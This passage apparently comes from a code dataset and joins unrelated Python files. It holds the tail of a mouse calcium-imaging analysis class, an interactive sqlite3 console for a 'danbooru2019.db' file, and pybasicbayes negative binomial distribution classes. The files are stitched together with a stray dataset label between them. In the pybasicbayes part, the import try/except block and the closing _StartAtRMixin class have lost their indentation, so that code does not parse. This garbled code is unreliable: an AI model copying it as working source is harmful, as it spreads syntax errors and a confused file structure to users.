    "_R" suffix for rest trials, and the version part joins one analysis
    version number per step up to and including `step`.
    '''
    step_index = self.data_structure.get_step_index(step)
    idx = self.index_assignation()
    mouse, session, trial, is_rest = idx[0], idx[1], idx[2], idx[3]
    # Rest trials get an "_R" suffix on the trial number
    trial_part = f'{trial}_R' if is_rest else f'{trial}'
    # One version number per step, dot-separated, prefixed with "v"
    version_part = 'v' + '.'.join(str(idx[4 + i]) for i in range(step_index + 1))
    return f'mouse_{mouse}_session_{session}_trial_{trial_part}_{version_part}'
class movie():
    '''
    This class contains all methods that can be applied to a movie:
    it binds a data configuration for one analysis state, loads the step's
    parameters and the selected analysis rows, and provides logging/cluster
    helpers for the processing steps.
    '''
    def __init__(self, step, mouse = None, session = None, trial = None, is_rest = None,
                 decoding_v = None, cropping_v = None,
                 motion_correction_v = None, alignment_v = None,
                 source_extraction_v = None, component_evaluation_v = None,
                 selected_rows = None, parameters = None):
        self.data = data_configuration(mouse, session, trial, is_rest, decoding_v, cropping_v,
                                       motion_correction_v, alignment_v, source_extraction_v, component_evaluation_v)
        self.step_index = self.data.data_structure.get_step_index(step)
        self.step = step
        self.index = self.data.index_assignation()
        # Decoding (step index 0) has no stored parameters
        self.parameters = self.data.get_parameters(self.step) if self.step_index != 0 else None
        # If provided, update them with the forced parameters
        if parameters is not None:  # BUG FIX: was `parameters != None`
            if self.parameters is None:
                # step 0 has no database parameters; use the forced ones only
                self.parameters = dict(parameters)
            else:
                self.parameters.update(parameters)
        ## select the state of analysis
        self.selected_rows = self.data.select(self.step)
        # If provided and the rows are a pandas data frame, update them with the selected rows.
        # BUG FIX: `selected_rows != None` on a DataFrame compares elementwise
        # and raises on truth-testing; isinstance covers both original checks.
        if isinstance(selected_rows, pd.DataFrame) and self.selected_rows is not None:
            self.selected_rows.update(selected_rows)
        # select() returns None for an invalid step; guard before .empty
        if self.selected_rows is None or self.selected_rows.empty:
            logging.error('No analysis states. Cancelling')
            return

    def version_setting(self):
        '''
        Work in progress: determine the next analysis version for the step.
        Only the data loading is implemented; the version computation below
        is the author's commented-out draft, preserved verbatim.
        '''
        analysis_version = self.data.version_assignation()
        db_states = self.data.data_structure.open_database()
        #if analysis_version[step]== None:
        #data_structure_len = len(self.data.data_structure.data)
        #version_len = len(self.data.data_structure.analysis)
        #common_name = db_states.loc[:data_structure_len + self.step_index]
        #max_version = common_name.reset_index().sort_values(by self.data.data_structure.data_analysis[version_len + self.step_index:]).iloc[-1].loc[f'{step}_v']
        #logging.debug(f'Max. version for step: {step}, input analysis state: {index[:len(variables.data_structure) + step_index]} is {max_version}')
        #index = list(index) ; index[len(variables.data_structure) + step_index] = max_version + 1 ; index = tuple(index)

    def file_handler(self):
        '''
        Attach a DEBUG-level logging.FileHandler that writes to the step's
        log directory, named after the current analysis state.
        '''
        # Source extraction (step index 4) logs are split session-/trial-wise
        # BUG FIX: the trial_wise branch referenced the undefined name `step`
        step_data_dir = f'{self.step}/' if self.step_index != 4 else (f'{self.step}/session_wise/' if self.parameters['session_wise'] else f'{self.step}/trial_wise/')
        log_file_path = f'data/interim/{step_data_dir}meta/log/{self.data.create_file_name(self.step)}.log'
        print(log_file_path)
        fh = logging.FileHandler(log_file_path)
        fh.setLevel(logging.DEBUG)
        # create formatter and add it to the handlers
        formatter = logging.Formatter("%(relativeCreated)12d [%(filename)s:%(funcName)20s():%(lineno)s]"
                                      "[%(process)d] %(message)s")
        fh.setFormatter(formatter)
        # add the handlers to the logger
        logging.root.addHandler(fh)

    def server_step(self):
        '''
        For steps performed on the server (motion correction, alignment,
        source extraction, component evaluation) restart the CaImAn cluster
        and return (client, dview, n_processes).
        '''
        server_step_indices = [2, 3, 4, 5]
        if self.step_index in server_step_indices:
            # Cluster management for steps performed on the server:
            # stop the cluster if one exists, then start a fresh one.
            n_processes = psutil.cpu_count()
            cm.cluster.stop_server()
            # Start a new cluster
            c, dview, n_processes = cm.cluster.setup_cluster(backend='local',
                                                             n_processes=n_processes,  # reduce if you run out of memory
                                                             single_thread=False)
            logging.info(f'Starting cluster. n_processes = {n_processes}.')
            return c, dview, n_processes

    def confirm_analysis(self, check_rows = None):
        '''
        Optionally ask the user for a final confirmation in the console
        before running the step on the selected analysis states.
        '''
        if check_rows:
            # Ask for a final confirmation after selecting analysis states and parameters.
            # BUG FIX: these prompts referenced the undefined name `step`
            print(f'Perform {self.step} on these states?')
            continue_step = ''
            while continue_step != 'yes' and continue_step != 'no':
                print("Type 'yes' or 'no'")
                continue_step = input()
            if continue_step == 'no':
                print(f'Cancelling {self.step}.')
                return
            print(f'Continuing with {self.step}.')

    # The step runners below were declared without bodies in the original
    # (a syntax error). Parameter-name typos (decofing_v, sourse_extraction_v)
    # are preserved so keyword callers keep working.
    def decoding(self, decoding_v):
        raise NotImplementedError
    def cropping(self, decoding_v, cropping_v):
        raise NotImplementedError
    def motion_correction(self, decofing_v, cropping_v, motion_correction_v):
        raise NotImplementedError
    def alignment(self, decofing_v, cropping_v, motion_correction_v, alignment_v):
        raise NotImplementedError
    def source_extraction(self, decofing_v, cropping_v, motion_correction_v, alignment_v, sourse_extraction_v):
        raise NotImplementedError
    def component_evaluation(self, decofing_v, cropping_v, motion_correction_v, alignment_v, sourse_extraction_v, component_evaluation):
        raise NotImplementedError
| nilq/baby-python | python |
import sqlite3

# Minimal interactive SQL console against the danbooru2019 database.
con = sqlite3.connect("danbooru2019.db")
con.isolation_level = None  # autocommit mode: each statement commits immediately
cur = con.cursor()
buffer = ""

print("Enter your SQL commands to execute in sqlite3; terminated with semicolon (;)")
print("Enter a blank line to exit.")
try:
    while True:
        line = input()
        if line == "":
            break
        # BUG FIX: join input lines with a newline, otherwise tokens at the
        # end of one line fuse with the start of the next ("...*FROM t;").
        buffer += line + "\n"
        # Only execute once the accumulated text forms a complete statement
        if sqlite3.complete_statement(buffer):
            try:
                buffer = buffer.strip()
                cur.execute(buffer)
                start = buffer.lstrip().upper()
                if start.startswith(("SELECT", "EXPLAIN")):  # allow explain query plan
                    res = cur.fetchall()
                    print(res)
            except sqlite3.Error as e:
                print("An error occurred:", e.args[0])
            buffer = ""
finally:
    # BUG FIX: close the connection even on EOF/KeyboardInterrupt;
    # the original con.close() was skipped whenever the loop raised.
    con.close()
from __future__ import division
from builtins import zip
from builtins import range
from builtins import object
__all__ = [
'NegativeBinomial', 'NegativeBinomialFixedR', 'NegativeBinomialIntegerR2',
'NegativeBinomialIntegerR', 'NegativeBinomialFixedRVariant',
'NegativeBinomialIntegerRVariant', 'NegativeBinomialIntegerRVariant',
'NegativeBinomialIntegerR2Variant']
import numpy as np
from numpy import newaxis as na
import scipy.special as special
from scipy.special import logsumexp
from warnings import warn
from pybasicbayes.abstractions import Distribution, GibbsSampling, \
MeanField, MeanFieldSVI, MaxLikelihood
from pybasicbayes.util.stats import getdatasize, flattendata, \
sample_discrete_from_log, sample_discrete, atleast_2d
try:
from pybasicbayes.util.cstats import sample_crp_tablecounts
except ImportError:
warn('using slow sample_crp_tablecounts')
from pybasicbayes.util.stats import sample_crp_tablecounts
class _NegativeBinomialBase(Distribution):
    '''
    Negative Binomial distribution with a conjugate beta prior on p and a
    separate gamma prior on r. The parameter r does not need to be an integer.
    If r is an integer, then x ~ NegBin(r,p) is the same as
    x = np.random.geometric(1-p,size=r).sum() - r
    where r is subtracted to make the geometric support be {0,1,2,...}
    Mean is r*p/(1-p), var is r*p/(1-p)**2
    Uses the data augmentation sampling method from Zhou et al. ICML 2012
    NOTE: the support is {0,1,2,...}.
    Hyperparameters:
        k_0, theta_0: r ~ Gamma(k, theta)
        or r = np.random.gamma(k,theta)
        alpha_0, beta_0: p ~ Beta(alpha,beta)
        or p = np.random.beta(alpha,beta)
    Parameters:
        r
        p
    '''
    def __init__(self,r=None,p=None,k_0=None,theta_0=None,alpha_0=None,beta_0=None):
        # current parameter values (may stay None until resampled)
        self.r = r
        self.p = p
        # gamma prior hyperparameters on r
        self.k_0 = k_0
        self.theta_0 = theta_0
        # beta prior hyperparameters on p
        self.alpha_0 = alpha_0
        self.beta_0 = beta_0
        if r is p is None and not any(_ is None for _ in (k_0,theta_0,alpha_0,beta_0)):
            self.resample() # initialize from prior
    @property
    def params(self):
        """Current model parameters."""
        return dict(r=self.r,p=self.p)
    @property
    def hypparams(self):
        """Prior hyperparameters (gamma prior on r, beta prior on p)."""
        return dict(k_0=self.k_0,theta_0=self.theta_0,
                alpha_0=self.alpha_0,beta_0=self.beta_0)
    def log_likelihood(self,x,r=None,p=None):
        """Elementwise log pmf of x under NegBin(r, p); negative x gets -inf.

        NOTE(review): x is rebound via np.array(x, ndmin=1), so the trailing
        isinstance check is always True and an ndarray is always returned,
        even for scalar input — confirm whether callers rely on this.
        """
        r = r if r is not None else self.r
        p = p if p is not None else self.p
        x = np.array(x,ndmin=1)
        if self.p > 0:
            xnn = x[x >= 0]
            raw = np.empty(x.shape)
            # log NB pmf: log C(x+r-1, x) + r log(1-p) + x log(p)
            raw[x>=0] = special.gammaln(r + xnn) - special.gammaln(r) \
                    - special.gammaln(xnn+1) + r*np.log(1-p) + xnn*np.log(p)
            raw[x<0] = -np.inf
            return raw if isinstance(x,np.ndarray) else raw[0]
        else:
            # degenerate case p == 0: point mass at x = 0
            raw = np.log(np.zeros(x.shape))
            raw[x == 0] = 0.
            return raw if isinstance(x,np.ndarray) else raw[0]
    def log_sf(self,x):
        """Log survival function log P(X > x), elementwise."""
        scalar = not isinstance(x,np.ndarray)
        x = np.atleast_1d(x)
        errs = np.seterr(divide='ignore')  # log(0) -> -inf is intended
        # P(X > x) = I_p(x+1, r), the regularized incomplete beta function
        ret = np.log(special.betainc(x+1,self.r,self.p))
        np.seterr(**errs)
        ret[x < 0] = np.log(1.)  # P(X > x) = 1 for x below the support
        if scalar:
            return ret[0]
        else:
            return ret
    def rvs(self,size=None):
        """Sample via the gamma-Poisson mixture representation of the NB."""
        return np.random.poisson(np.random.gamma(self.r,self.p/(1-self.p),size=size))
class NegativeBinomial(_NegativeBinomialBase, GibbsSampling):
    """Negative binomial with both r and p resampled by Gibbs, using the
    CRP-table-count data augmentation of Zhou et al. (ICML 2012)."""
    def resample(self,data=[],niter=20):
        """Gibbs-resample (r, p); with no data, draw both from their priors."""
        if getdatasize(data) == 0:
            self.p = np.random.beta(self.alpha_0,self.beta_0)
            self.r = np.random.gamma(self.k_0,self.theta_0)
        else:
            data = atleast_2d(flattendata(data))
            N = len(data)
            # alternate r | p and p | r for niter inner iterations
            for itr in range(niter):
                ### resample r
                # msum = total CRP table counts (augmentation variable)
                msum = sample_crp_tablecounts(self.r,data).sum()
                self.r = np.random.gamma(self.k_0 + msum, 1/(1/self.theta_0 - N*np.log(1-self.p)))
                ### resample p
                self.p = np.random.beta(self.alpha_0 + data.sum(), self.beta_0 + N*self.r)
        return self
    def resample_python(self,data=[],niter=20):
        """Pure-Python version of resample (no cython table-count helper)."""
        if getdatasize(data) == 0:
            self.p = np.random.beta(self.alpha_0,self.beta_0)
            self.r = np.random.gamma(self.k_0,self.theta_0)
        else:
            data = flattendata(data)
            N = len(data)
            for itr in range(niter):
                ### resample r
                msum = 0.
                for n in data:
                    # simulate the CRP table count for this observation
                    msum += (np.random.rand(n) < self.r/(np.arange(n)+self.r)).sum()
                self.r = np.random.gamma(self.k_0 + msum, 1/(1/self.theta_0 - N*np.log(1-self.p)))
                ### resample p
                self.p = np.random.beta(self.alpha_0 + data.sum(), self.beta_0 + N*self.r)
        return self
    ### OLD unused alternatives
    def resample_logseriesaug(self,data=[],niter=20):
        # an alternative algorithm, kind of opaque and no advantages...
        # NOTE(review): requires _set_up_logF() to have been called so that
        # self.logF exists — confirm before reviving this code path.
        if getdatasize(data) == 0:
            self.p = np.random.beta(self.alpha_0,self.beta_0)
            self.r = np.random.gamma(self.k_0,self.theta_0)
        else:
            data = flattendata(data)
            N = data.shape[0]
            logF = self.logF
            L_i = np.zeros(N)
            data_nz = data[data > 0]
            for itr in range(niter):
                logR = np.arange(1,logF.shape[1]+1)*np.log(self.r) + logF
                L_i[data > 0] = sample_discrete_from_log(logR[data_nz-1,:data_nz.max()],axis=1)+1
                self.r = np.random.gamma(self.k_0 + L_i.sum(), 1/(1/self.theta_0 - np.log(1-self.p)*N))
                self.p = np.random.beta(self.alpha_0 + data.sum(), self.beta_0 + N*self.r)
        return self
    @classmethod
    def _set_up_logF(cls):
        """Precompute and cache (once per class) the log F table used by
        resample_logseriesaug."""
        if not hasattr(cls,'logF'):
            # actually indexes logF[0,0] to correspond to log(F(1,1)) in Zhou
            # paper, but keeps track of that alignment with the other code!
            # especially arange(1,...), only using nonzero data and shifting it
            SIZE = 500
            logF = -np.inf * np.ones((SIZE,SIZE))
            logF[0,0] = 0.
            for m in range(1,logF.shape[0]):
                # each row is a convolution of the previous one, computed in
                # a max-shifted space for numerical stability
                prevrow = np.exp(logF[m-1] - logF[m-1].max())
                logF[m] = np.log(np.convolve(prevrow,[0,m,1],'same')) + logF[m-1].max()
            cls.logF = logF
class NegativeBinomialFixedR(_NegativeBinomialBase, GibbsSampling, MeanField, MeanFieldSVI, MaxLikelihood):
    """Negative binomial with r held fixed; only p is inferred under a
    conjugate Beta(alpha_0, beta_0) prior. The variational factor on p is
    Beta(alpha_mf, beta_mf)."""
    def __init__(self,r=None,p=None,alpha_0=None,beta_0=None,alpha_mf=None,beta_mf=None):
        self.p = p
        self.r = r
        # beta prior hyperparameters on p
        self.alpha_0 = alpha_0
        self.beta_0 = beta_0
        if p is None and not any(_ is None for _ in (alpha_0,beta_0)):
            self.resample() # initialize from prior
        if not any(_ is None for _ in (alpha_mf,beta_mf)):
            # variational Beta factor parameters, if supplied
            self.alpha_mf = alpha_mf
            self.beta_mf = beta_mf
    @property
    def hypparams(self):
        return dict(alpha_0=self.alpha_0,beta_0=self.beta_0)
    @property
    def natural_hypparam(self):
        # Beta natural parameters are (alpha - 1, beta - 1)
        return np.array([self.alpha_0,self.beta_0]) - 1
    @natural_hypparam.setter
    def natural_hypparam(self,natparam):
        self.alpha_0, self.beta_0 = natparam + 1
    ### Mean Field
    def _resample_from_mf(self):
        """Draw p from the current variational Beta factor."""
        self.p = np.random.beta(self.alpha_mf,self.beta_mf)
        return self
    def meanfieldupdate(self,data,weights):
        """Exact mean-field coordinate update of the Beta factor on p."""
        self.alpha_mf, self.beta_mf = \
                self._posterior_hypparams(*self._get_weighted_statistics(data,weights))
        # point estimate (variational posterior mean) for prediction/plotting
        self.p = self.alpha_mf / (self.alpha_mf + self.beta_mf)
    def meanfield_sgdstep(self,data,weights,prob,stepsize):
        """SVI step: `prob` is the minibatch inclusion probability used to
        rescale the statistics; `stepsize` interpolates old/new parameters."""
        alpha_new, beta_new = \
                self._posterior_hypparams(*(
                    1./prob * self._get_weighted_statistics(data,weights)))
        self.alpha_mf = (1-stepsize)*self.alpha_mf + stepsize*alpha_new
        self.beta_mf = (1-stepsize)*self.beta_mf + stepsize*beta_new
        self.p = self.alpha_mf / (self.alpha_mf + self.beta_mf)
    def get_vlb(self):
        """Contribution of the p factor to the variational lower bound:
        E_q[log p(p)] plus the entropy of q(p)."""
        Elnp, Eln1mp = self._mf_expected_statistics()
        p_avgengy = (self.alpha_0-1)*Elnp + (self.beta_0-1)*Eln1mp \
                - (special.gammaln(self.alpha_0) + special.gammaln(self.beta_0)
                        - special.gammaln(self.alpha_0 + self.beta_0))
        q_entropy = special.betaln(self.alpha_mf,self.beta_mf) \
                - (self.alpha_mf-1)*special.digamma(self.alpha_mf) \
                - (self.beta_mf-1)*special.digamma(self.beta_mf) \
                + (self.alpha_mf+self.beta_mf-2)*special.digamma(self.alpha_mf+self.beta_mf)
        return p_avgengy + q_entropy
    def _mf_expected_statistics(self):
        """Return E_q[log p] and E_q[log(1-p)] under the Beta factor."""
        Elnp, Eln1mp = special.digamma([self.alpha_mf,self.beta_mf]) \
                - special.digamma(self.alpha_mf + self.beta_mf)
        return Elnp, Eln1mp
    def expected_log_likelihood(self,x):
        """E_q[log p(x | r, p)] elementwise over x."""
        Elnp, Eln1mp = self._mf_expected_statistics()
        x = np.atleast_1d(x)
        errs = np.seterr(invalid='ignore')
        out = x*Elnp + self.r*Eln1mp + self._log_base_measure(x,self.r)
        np.seterr(**errs)
        out[np.isnan(out)] = -np.inf  # NaNs arise from out-of-support x
        return out if out.shape[0] > 1 else out[0]
    @staticmethod
    def _log_base_measure(x,r):
        # log of the NB combinatorial term log C(x+r-1, x)
        return special.gammaln(x+r) - special.gammaln(x+1) - special.gammaln(r)
    ### Gibbs
    def resample(self,data=[]):
        """Gibbs-resample p from its conjugate Beta posterior."""
        self.p = np.random.beta(*self._posterior_hypparams(*self._get_statistics(data)))
        # set mean field params to something reasonable for initialization
        fakedata = self.rvs(10)
        self.alpha_mf, self.beta_mf = self._posterior_hypparams(*self._get_statistics(fakedata))
    ### Max likelihood
    def max_likelihood(self,data,weights=None):
        if weights is None:
            n, tot = self._get_statistics(data)
        else:
            n, tot = self._get_weighted_statistics(data,weights)
        # closed-form MLE of p for fixed r: mean / (r + mean)
        self.p = (tot/n) / (self.r + tot/n)
        return self
    ### Statistics and posterior hypparams
    def _get_statistics(self,data):
        """Return (count, sum) for data given as array, list of arrays, or scalar."""
        if getdatasize(data) == 0:
            n, tot = 0, 0
        elif isinstance(data,np.ndarray):
            assert np.all(data >= 0)
            data = np.atleast_1d(data)
            n, tot = data.shape[0], data.sum()
        elif isinstance(data,list):
            assert all(np.all(d >= 0) for d in data)
            n = sum(d.shape[0] for d in data)
            tot = sum(d.sum() for d in data)
        else:
            assert np.isscalar(data)
            n = 1
            tot = data
        return np.array([n, tot])
    def _get_weighted_statistics(self,data,weights):
        """Weighted (count, sum); weights mirror the layout of data."""
        if isinstance(weights,np.ndarray):
            assert np.all(data >= 0) and data.ndim == 1
            n, tot = weights.sum(), weights.dot(data)
        else:
            assert all(np.all(d >= 0) for d in data)
            n = sum(w.sum() for w in weights)
            tot = sum(w.dot(d) for d,w in zip(data,weights))
        return np.array([n, tot])
    def _posterior_hypparams(self,n,tot):
        # conjugate Beta posterior: (alpha_0 + sum x, beta_0 + n r)
        return np.array([self.alpha_0 + tot, self.beta_0 + n*self.r])
class NegativeBinomialIntegerR2(_NegativeBinomialBase,MeanField,MeanFieldSVI,GibbsSampling):
    """Negative binomial with a discrete prior over integer r, implemented
    as a mixture of fixed-r component distributions (one per supported r).
    rho_0 / rho_mf hold the log prior / log variational weights over r."""
    # NOTE: this class should replace NegativeBinomialFixedR completely...
    _fixedr_class = NegativeBinomialFixedR
    def __init__(self,alpha_0=None,beta_0=None,alphas_0=None,betas_0=None,
            r_support=None,r_probs=None,r_discrete_distn=None,
            r=None,ps=None):
        # either a dense r_discrete_distn, or an explicit (r_support, r_probs)
        assert (r_discrete_distn is not None) ^ (r_support is not None and r_probs is not None)
        if r_discrete_distn is not None:
            r_support, = np.where(r_discrete_distn)
            r_probs = r_discrete_distn[r_support]
            r_support += 1  # index i carries the mass of r = i+1
        self.r_support = np.asarray(r_support)
        self.rho_0 = self.rho_mf = np.log(r_probs)
        # per-component Beta hyperparameters: shared (alpha_0, beta_0) or lists
        assert (alpha_0 is not None and beta_0 is not None) \
                ^ (alphas_0 is not None and betas_0 is not None)
        alphas_0 = alphas_0 if alphas_0 is not None else [alpha_0]*len(r_support)
        betas_0 = betas_0 if betas_0 is not None else [beta_0]*len(r_support)
        ps = ps if ps is not None else [None]*len(r_support)
        # one fixed-r component per supported r value
        self._fixedr_distns = \
                [self._fixedr_class(r=r,p=p,alpha_0=alpha_0,beta_0=beta_0)
                        for r,p,alpha_0,beta_0 in zip(r_support,ps,alphas_0,betas_0)]
        # for init
        self.ridx = sample_discrete(r_probs)
        self.r = r_support[self.ridx]
    def __repr__(self):
        return 'NB(r=%d,p=%0.3f)' % (self.r,self.p)
    @property
    def alphas_0(self):
        # per-component prior alphas (None when there are no components)
        return np.array([d.alpha_0 for d in self._fixedr_distns]) \
                if len(self._fixedr_distns) > 0 else None
    @property
    def betas_0(self):
        # per-component prior betas (None when there are no components)
        return np.array([d.beta_0 for d in self._fixedr_distns]) \
                if len(self._fixedr_distns) > 0 else None
    @property
    def p(self):
        # p of the currently selected component
        return self._fixedr_distns[self.ridx].p
    @p.setter
    def p(self,val):
        self._fixedr_distns[self.ridx].p = val
    def _resample_from_mf(self):
        """Draw (r, p) from the variational posterior."""
        self._resample_r_from_mf()
        self._resample_p_from_mf()
    def _resample_r_from_mf(self):
        # sample a component index from the normalized variational weights
        lognorm = logsumexp(self.rho_mf)
        self.ridx = sample_discrete(np.exp(self.rho_mf - lognorm))
        self.r = self.r_support[self.ridx]
    def _resample_p_from_mf(self):
        d = self._fixedr_distns[self.ridx]
        self.p = np.random.beta(d.alpha_mf,d.beta_mf)
    def get_vlb(self):
        # mixture VLB: r-part plus the weight-averaged component VLBs
        return self._r_vlb() + sum(np.exp(rho)*d.get_vlb()
                for rho,d in zip(self.rho_mf,self._fixedr_distns))
    def _r_vlb(self):
        # E_q[log p(r)] plus the entropy of q(r)
        return np.exp(self.rho_mf).dot(self.rho_0) \
                - np.exp(self.rho_mf).dot(self.rho_mf)
    def meanfieldupdate(self,data,weights):
        """Update every fixed-r component, then the weights over r."""
        for d in self._fixedr_distns:
            d.meanfieldupdate(data,weights)
        self._update_rho_mf(data,weights)
        # everything below here is for plotting
        ridx = self.rho_mf.argmax()
        d = self._fixedr_distns[ridx]
        self.r = d.r
        self.p = d.alpha_mf / (d.alpha_mf + d.beta_mf)
    def _update_rho_mf(self,data,weights):
        """Recompute the (unnormalized) log variational weights over r."""
        self.rho_mf = self.rho_0.copy()
        for idx, d in enumerate(self._fixedr_distns):
            n, tot = d._get_weighted_statistics(data,weights)
            Elnp, Eln1mp = d._mf_expected_statistics()
            self.rho_mf[idx] += (d.alpha_0-1+tot)*Elnp + (d.beta_0-1+n*d.r)*Eln1mp
            # add the data's base-measure terms under this component's r
            if isinstance(data,np.ndarray):
                self.rho_mf[idx] += weights.dot(d._log_base_measure(data,d.r))
            else:
                self.rho_mf[idx] += sum(w.dot(d._log_base_measure(dt,d.r))
                        for dt,w in zip(data,weights))
    def expected_log_likelihood(self,x):
        # expectation over the normalized variational weights on r
        lognorm = logsumexp(self.rho_mf)
        return sum(np.exp(rho-lognorm)*d.expected_log_likelihood(x)
                for rho,d in zip(self.rho_mf,self._fixedr_distns))
    def meanfield_sgdstep(self,data,weights,prob,stepsize):
        """SVI step on both the r weights and the fixed-r components."""
        rho_mf_orig = self.rho_mf.copy()
        if isinstance(data,np.ndarray):
            self._update_rho_mf(data,prob*weights)
        else:
            self._update_rho_mf(data,[w*prob for w in weights])
        rho_mf_new = self.rho_mf
        for d in self._fixedr_distns:
            d.meanfield_sgdstep(data,weights,prob,stepsize)
        # interpolate between old and rescaled-new weights
        self.rho_mf = (1-stepsize)*rho_mf_orig + stepsize*rho_mf_new
        # for plotting
        ridx = self.rho_mf.argmax()
        d = self._fixedr_distns[ridx]
        self.r = d.r
        self.p = d.alpha_mf / (d.alpha_mf + d.beta_mf)
    def resample(self,data=[]):
        self._resample_r(data) # marginalizes out p values
        self._resample_p(data) # resample p given sampled r
        return self
    def _resample_r(self,data):
        # sample r from its collapsed conditional (p integrated out)
        self.ridx = sample_discrete(
                self._posterior_hypparams(self._get_statistics(data)))
        self.r = self.r_support[self.ridx]
        return self
    def _resample_p(self,data):
        self._fixedr_distns[self.ridx].resample(data)
        return self
    def _get_statistics(self,data=[]):
        """Log marginal likelihood of the data under each supported r
        (with each component's p integrated out)."""
        n, tot = self._fixedr_distns[0]._get_statistics(data)
        if n > 0:
            data = flattendata(data)
            alphas_n, betas_n = self.alphas_0 + tot, self.betas_0 + self.r_support*n
            log_marg_likelihoods = \
                    special.betaln(alphas_n, betas_n) \
                        - special.betaln(self.alphas_0, self.betas_0) \
                    + (special.gammaln(data[:,na]+self.r_support)
                        - special.gammaln(data[:,na]+1) \
                        - special.gammaln(self.r_support)).sum(0)
        else:
            log_marg_likelihoods = np.zeros_like(self.r_support)
        return log_marg_likelihoods
    def _posterior_hypparams(self,log_marg_likelihoods):
        # unnormalized posterior over r, max-shifted for numerical stability
        log_posterior_discrete = self.rho_0 + log_marg_likelihoods
        return np.exp(log_posterior_discrete - log_posterior_discrete.max())
class NegativeBinomialIntegerR(NegativeBinomialFixedR, GibbsSampling, MaxLikelihood):
    '''
    Nonconjugate Discrete+Beta prior
    r_discrete_distribution is an array where index i is p(r=i+1)
    '''
    def __init__(self,r_discrete_distn=None,r_support=None,
            alpha_0=None,beta_0=None,r=None,p=None):
        self.r_support = r_support
        self.r_discrete_distn = r_discrete_distn
        # beta prior hyperparameters on p
        self.alpha_0 = alpha_0
        self.beta_0 = beta_0
        self.r = r
        self.p = p
        if r is p is None \
                and not any(_ is None for _ in (r_discrete_distn,alpha_0,beta_0)):
            self.resample() # initialize from prior
    @property
    def hypparams(self):
        return dict(r_discrete_distn=self.r_discrete_distn,
                alpha_0=self.alpha_0,beta_0=self.beta_0)
    def get_r_discrete_distn(self):
        return self._r_discrete_distn
    def set_r_discrete_distn(self,r_discrete_distn):
        """Normalize the discrete distribution over r and cache its support;
        r_probs[i] is the prior mass on r = r_support[i]."""
        if r_discrete_distn is not None:
            # BUG FIX: np.float was deprecated in NumPy 1.20 and removed in
            # 1.24; the builtin float is the documented replacement.
            r_discrete_distn = np.asarray(r_discrete_distn,dtype=float)
            r_support, = np.where(r_discrete_distn)
            r_probs = r_discrete_distn[r_support]
            r_probs /= r_probs.sum()
            r_support += 1 # r_probs[0] corresponds to r=1
            self.r_support = r_support
            self.r_probs = r_probs
            self._r_discrete_distn = r_discrete_distn
    r_discrete_distn = property(get_r_discrete_distn,set_r_discrete_distn)
    def rvs(self,size=None):
        """Sample as a sum of r shifted geometrics (support {0,1,2,...})."""
        out = np.random.geometric(1-self.p,size=size)-1
        for i in range(self.r-1):
            out += np.random.geometric(1-self.p,size=size)-1
        return out
    def resample(self,data=[]):
        """Gibbs: sample r from its collapsed conditional (p integrated out),
        then p from its Beta posterior given the sampled r."""
        alpha_n, betas_n, posterior_discrete = self._posterior_hypparams(
                *self._get_statistics(data))
        r_idx = sample_discrete(posterior_discrete)
        self.r = self.r_support[r_idx]
        self.p = np.random.beta(alpha_n, betas_n[r_idx])
    # NOTE: this class has a conjugate prior even though it's not in the
    # exponential family, so I wrote _get_statistics and _get_weighted_statistics
    # (which integrate out p) for the resample() and meanfield_update() methods,
    # though these aren't statistics in the exponential family sense
    def _get_statistics(self,data):
        # NOTE: since this isn't really in exponential family, this method needs
        # to look at hyperparameters. form posterior hyperparameters for the p
        # parameters here so we can integrate them out and get the r statistics
        n, tot = super(NegativeBinomialIntegerR,self)._get_statistics(data)
        if n > 0:
            alpha_n, betas_n = self.alpha_0 + tot, self.beta_0 + self.r_support*n
            data = flattendata(data)
            # log marginal likelihood of the data for each supported r
            log_marg_likelihoods = \
                    special.betaln(alpha_n, betas_n) \
                        - special.betaln(self.alpha_0, self.beta_0) \
                    + (special.gammaln(data[:,na]+self.r_support)
                        - special.gammaln(data[:,na]+1) \
                        - special.gammaln(self.r_support)).sum(0)
        else:
            log_marg_likelihoods = np.zeros_like(self.r_support)
        return n, tot, log_marg_likelihoods
    def _get_weighted_statistics(self,data,weights):
        """Weighted analogue of _get_statistics."""
        n, tot = super(NegativeBinomialIntegerR,self)._get_weighted_statistics(data,weights)
        if n > 0:
            alpha_n, betas_n = self.alpha_0 + tot, self.beta_0 + self.r_support*n
            data, weights = flattendata(data), flattendata(weights)
            log_marg_likelihoods = \
                    special.betaln(alpha_n, betas_n) \
                        - special.betaln(self.alpha_0, self.beta_0) \
                    + (special.gammaln(data[:,na]+self.r_support)
                        - special.gammaln(data[:,na]+1) \
                        - special.gammaln(self.r_support)).dot(weights)
        else:
            log_marg_likelihoods = np.zeros_like(self.r_support)
        return n, tot, log_marg_likelihoods
    def _posterior_hypparams(self,n,tot,log_marg_likelihoods):
        alpha_n = self.alpha_0 + tot
        betas_n = self.beta_0 + n*self.r_support
        # unnormalized posterior over r, max-shifted for numerical stability
        log_posterior_discrete = np.log(self.r_probs) + log_marg_likelihoods
        posterior_discrete = np.exp(log_posterior_discrete - log_posterior_discrete.max())
        return alpha_n, betas_n, posterior_discrete
    def max_likelihood(self,data,weights=None,stats=None):
        """Joint ML over (r, p): for each supported r use the closed-form p,
        then keep the pair with the highest data likelihood."""
        if stats is not None:
            n, tot = stats
        elif weights is None:
            n, tot = super(NegativeBinomialIntegerR,self)._get_statistics(data)
        else:
            n, tot = super(NegativeBinomialIntegerR,self)._get_weighted_statistics(data,weights)
        if n > 1:
            rs = self.r_support
            ps = self._max_likelihood_ps(n,tot,rs)
            # TODO TODO this isn't right for weighted data: do weighted sums
            if isinstance(data,np.ndarray):
                likelihoods = np.array([self.log_likelihood(data,r=r,p=p).sum()
                                            for r,p in zip(rs,ps)])
            else:
                likelihoods = np.array([sum(self.log_likelihood(d,r=r,p=p).sum()
                                            for d in data) for r,p in zip(rs,ps)])
            argmax = likelihoods.argmax()
            self.r = self.r_support[argmax]
            self.p = ps[argmax]
        return self
    def _log_base_measure(self,data):
        # per-r total log base measure of the data
        return [(special.gammaln(r+data) - special.gammaln(r) - special.gammaln(data+1)).sum()
                for r in self.r_support]
    def _max_likelihood_ps(self,n,tot,rs):
        # closed-form MLE of p given r: mean / (r + mean)
        ps = (tot/n) / (rs + tot/n)
        assert (ps >= 0).all()
        return ps
class _StartAtRMixin(object):
def log_likelihood(self,x,**kwargs):
r = kwargs['r'] if 'r' in kwargs else self.r
return super(_StartAtRMixin,self).log_likelihood(x-r,**kwargs)
def log_sf(self,x,**kwargs):
return super(_StartAtRMixin,self).log_sf(x-self.r,**kwargs)
